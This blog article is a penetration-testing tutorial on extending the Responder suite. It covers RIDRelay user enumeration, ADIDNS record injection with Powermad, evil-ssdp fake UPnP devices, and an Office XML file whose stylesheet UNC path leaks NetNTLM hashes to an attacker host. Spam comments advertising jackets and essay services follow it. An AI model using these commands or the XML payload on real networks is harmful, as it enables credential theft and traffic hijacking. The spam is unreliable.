In the previous two articles in this series we covered
various ideas and theories on how to expand and utilise the entire Responder
suite. This article is going to focus on expanding the suite further with a
focus on practical usages for your penetration tests. If you have not already
read the previous two articles in the series, you can find them on this website. I strongly advise
that you read these two articles before this one, as this article assumes the
knowledge contained within them.
Practical Applications – Identifying Targets
The primary difficulty with using MultiRelay is the
identification and capturing of admin users and their hashes. Whilst you can
specify an "ALL" parameter within MultiRelay if you are using the
following techniques effectively this will likely create a lot of failed login
attempt noise on the network. The tool RIDRelay, created by skorov allows us to
enumerate all users on a domain with RID cycling using the hash passing. This
tool can help us find admin users and other targets, privileges are not
required.
To execute this attack successfully you merely need to start
the tool using ridrelay.py –t <target> where the target parameter is a
host on the domain. You can also use the –o parameter to output enumerated
usernames to a file.
Example command: python ridrelay.py –t 192.168.1.11 –o
output.txt
The final step in the process is to get a user on the domain
to connect to the SMB server within RIDRelay. To do this you can use any of the
methods mentioned in the previous articles or one of the methods introduced
below. Make sure that you turn off the SMB server in Responder temporarily if
you started Responder before RIDRelay, or it will fail to bind to the necessary
ports.
Practical Applications – ADIDNS
Since this method's history and technical background is so
beautifully explained in this article: https://blog.netspi.com/exploiting-adidns/,
we will only cover the basic practical usage of the tool. If you want to learn
how this tool works and its history, please go and read the aforementioned
article.
By manipulating dynamic DNS updates we are able to insert
DNS records into ADIDNS if the default secure dynamic updates setting is
enabled. Using the tool linked to below you can insert various records using
the following commands:
Run this first:
Import-Module
$PWD\Invoke-DNSUpdate.ps1
Import-Module
$PWD\Powermad.ps1
Invoke-DNSUpdate –DNSType <type> -DNSName
<subdomain/FQDN> -DNSData <destination>
Example: Invoke-DNSUpdate –DNSType A -DNSName
smb.domain.local -DNSData 192.168.1.11
By inserting a new A record into ADIDNS we could re-route traffic from a major SMB server on the network to our own Responder server. It is also possible to add a wildcard record which will resolve as a fall back option for all DNS queries that do not exist within the DNS zone. This acts much like LLMNR/NBNS spoofing but may be available when they are not. You can also exploit WPAD through Responder even when LLMNR or wildcard additions are not available by adding a wpad record to the DNS zone.
New-ADIDNSNode –Node *
There are some limitations to what records you can and
cannot add discussed in the article above, in essence; you will be unable to
edit existing DNS records but are able to add new ones.
The download for this tool can be found on its GitHub page
here: https://github.com/Kevin-Robertson/Powermad
Practical Applications – SSDP
Another excellent tool which can help you exploit a Windows
network is evil-ssdp. This tool creates a fake UPnP device using SSDP spoofing
which will appear in users' Windows Explorer windows. When a user clicks on one
of these fake UPnP devices, they can be redirected to malicious web pages which
will allow you to grab their NetNTLM hash. As an interesting secondary
capability, the tool is also capable of identifying XML related vulnerabilities
in various applications.
Evil-ssdp can be executed by running the following:
essdp.py <interface> -t <template file>
Example: essdp.py eth0 –t Microsoft-azure
After running this command Windows devices on your local
network will begin to detect your fake UPnP device and will display it to
users. If the users click on this device, evil-ssdp will attempt to make an SMB
connection back to your attacking machine. To intercept this and grab hashes or
execute a hash passing attack make sure you are running Responder as discussed
in previous articles. This will only work on old browsers that still support
the file:// tag. The phishing functionality, which is shown below, works in all
browsers.
If you wish to maximise the effectiveness of this tool, I
highly recommend creating your own template file to mimic the environment a user
would normally see when visiting an internal website. A section on creating
your own templates can be found towards the bottom of the Gitlab page, which
can be found here: https://gitlab.com/initstring/evil-ssdp
Practical Applications – XML Office Files
This method is discussed in detail in this post here: https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
This attack method can be used very effectively in an email
phishing campaign against a domain, especially when targeted at admin users
identified by RIDRelay. To create an XML file which will send the reader's hash
to your Responder instance create the following XML file in a text editor:
<?xml version="1.0" encoding="utf-8"
?>
<?mso-application prodgid="Word.Document"?>
<?xml-stylesheet type="text/xsl" href=\\<Your
Responder IP\directory\file.xsl?>
If you wish to add content to the Word document to make it
look legitimate, you can first generate the document in Word and save it as an
XML file via the Save As menu. After doing this, you can insert the third line
of code in the XML code above into the top of your XML file. This method can be
executed with multiple types of Office document including Excel spread sheets.
When your victim opens this file they will be prompted to select an Office
application to open it with if they have not opened an Office XML file before.
If the target domain/host has a text editor assigned to read XML files by
default, this attack is unlikely to work.
For further information on this attack, I highly recommend
reading the article linked above.
Summary
Thank you for reading my practical guide to Responder, which
builds upon my previous two guides for Intermediate and Advanced usage of the
tool. If I find more ways to utilise the Responder suite in the future, I will
issue another article discussing them. Responder is an extremely flexible tool,
not just a niche attack for LLMNR/NBNS spoofing, as such; I highly recommend
you seek out your own methods to expand your suite as well.
I will read your two previous articles so that I can focus more on what you had to explain to us. It is just that I have to keep myself busy with the best MBA assignment writing service that I am availing myself of right now. Once I am done with it, I will join your discussion regarding all of this. I am sorry that I could not be part of it right now because of my academics but I will get back to you soon.
ReplyDeleteGenuine Women’s Black Leather Collarless Cross-zip Biker Jacket
ReplyDeleteThis Blog is very informative for us. Thanks for writing about it. In this article, some examples help me in applying in daily life. amazing You have explained each and everything very well in detail. I hope you will write more pieces which help us in our daily routines. Vlone Hoodie
ReplyDeleteI have to buy a light for my aquarium though before that I have to pay for my online cheap assignment help that I took from a top-notch brand. This has made me spent half of my monthly’s savings and I don’t know when will I buy the light for my fish. It’s been almost a month that my aquarium light has been fused and now I want to replace it. I will consider Supra Quad if it is worth investing in.
ReplyDelete
ReplyDeleteI will always let you and your words become part of my day because you never know how much you make my day happier and more complete. There are even times when I feel so down but I will feel better right after checking UblUldU your blogs. You have made me feel so good about myself all the time and please know that I do appreciate everything that you have.UblUldU
Hello, I am Anthony Anson from the London, United Kingdom. I am a blogger, academic writer at nursing writing service company and a digital marketer. I did bachelors in Advertising and Public Relations from the University of London. I have been working in this field for more than 5 years. My skills include all types of academic paper writing and buying, scheduling and advertising in various media format.
ReplyDeletebest assignment help online
RockStar Jackets is incredibly pleased to announce ourselves as the most dependable manufacturers and exporters of a variety of products comprising of Leather Garments.
ReplyDeleteLas Vegas Golden Knights Starter Varsity Satin Jacket
Rainbow LGBTQ Flag Skull Logo Fashion Fleece Jacket
Vegas Golden Knights The Leader Varsity Satin Jacket
Michigan Bomber Black Varsity Letterman Jacket
Vegas Golden Knights Enforcer Varsity Satin Jacket
Hello, I am Anthony Anson from the London, United Kingdom. I am a blogger, academic writer at nursing writing service company and a digital marketer. I did bachelors in Advertising and Public Relations from the University of London. I have been working in this field for more than 5 years. My skills include all types of academic paper writing and buying, scheduling and advertising in various media format.
ReplyDeletebest assignment help experts
management assignment help - assignmentsky
RightJackets is the best place for you to get the most original custom made products and more.We have the biggest range of a variety of products.
ReplyDeleteDoctor Strange 2 Xochitl Gomez Fleece Jacket
Tiktok Half Black & White Bomber Varsity Jacket
Drive Scorpion Ryan Gosling Black Bomber Satin Jacket
Dick Grayson Batman Yellow Logo Biker Leather Jacket
Clark Kent Crows Smallville Varsity Letterman Jacket
Aussie Jackets not only offers you the readymade collection but take custom bulk orders and Free Delivery. Visit My Website To Order. Thanks
ReplyDeleteOakland Raider Brown Varsity Wool Jacket
Queen Of Diamonds Brown Biker Leather Jacket
Big Raccoon Fur Collar Moto Yellow Leather Jacket
Warrior Princess Grey Biker Leather Jacket
Panther Jackets Is A Leather Jackets WareHouse Providing Jackets In USA, Canada and UK.With Free Shipping
ReplyDeleteYakuza Kirihito Goro Majima And Spring Printed Dragon Logo Jacket
Joe Flanigan Stargate Atlantis John Sheppard Black Leather Jacket
Pornhub Letterman Wool Jacket
Kill City Perfect Black Leather Jacket
here
ReplyDeleteIf you're hosting a party or just want to treat your friends, how much fruit salad ca you make,you'll want to make sure everyone gets into the punch.
ReplyDeletehow much fruit salad per person
Now a days online business are very trending and tremendous all over the due to corovirus. This is very esay way to earn money online but i found in google i saw one article how to write and get paid marketing.
Write and Get Paid
I made my assignment by myself easily but I remember when I took admission to the university initially faced very difficulties with my academic work then I found a method to make my assignments through the help of Reflective essay writing service Uk UK [url=""]google uk[/url] service they are the best in the academic field.
ReplyDeleteWe Introduce Bomber Jackets In United State With Primium Quality Leather Used In Making Leather Jackets
ReplyDelete100 Mission A-2 Pilot’s Brown Leather Jacket
We Provide You Best Paint rollers sets in the world.
ReplyDeletePaint Roller Sets
Raulde Painting Kit allows you to paint anywhere in your house without any hassle.
ReplyDeleteVisit for Paint Rollers
Such an informative post. The article is really helpful. Thanks for sharing the knowledge and experience.
ReplyDeleteSite : Southside Serpents Black Leather Jacket